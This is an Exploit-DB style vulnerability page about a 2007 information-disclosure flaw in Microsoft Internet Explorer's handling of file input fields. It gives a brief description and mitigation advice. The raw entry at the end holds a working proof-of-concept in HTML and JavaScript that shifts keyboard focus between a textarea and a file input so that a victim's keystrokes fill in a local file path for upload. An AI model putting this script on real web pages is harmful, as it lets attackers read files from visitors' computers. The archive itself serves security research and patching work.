header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Unknown
5.5
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Internet Explorer
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:microsoft:internet_explorer
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

Information Disclosure Vulnerability in Microsoft Internet Explorer

The vulnerability allows attackers to gain access to the contents of arbitrary files by exploiting a design error in the handling of form fields in Microsoft Internet Explorer. An attacker can use a specially crafted script to manipulate the behavior of the file input field and access the contents of files on the victim's system.

Mitigation:

Apply the latest security patches and updates from Microsoft. Avoid visiting untrusted websites and downloading files from untrusted sources. Use alternative web browsers until the vulnerability is patched.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25836/info

Microsoft Internet Explorer is prone to an information-disclosure vulnerability that allows attackers to gain access to the contents of arbitrary files.

This issue stems from a design error resulting from the improper handling of form fields.

This issue is similar to the one described in BID 24725 (Mozilla Firefox OnKeyDown Event File Upload Vulnerability). 

# based upon Hong's exploit:
# http://sla.ckers.org/forum/read.php?3,13142

<script>

function Clear() {
     document.getElementById("label1").htmlFor="file1";
     document.getElementById("text1").focus();
}

function Down() {
     document.getElementById("file1").focus();
}

</script>

<input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<label id="label1" name="label1"></label>
<br />
<textarea name="text1" id="text1" onkeydown="Down()">
&lt;/textarea&gt;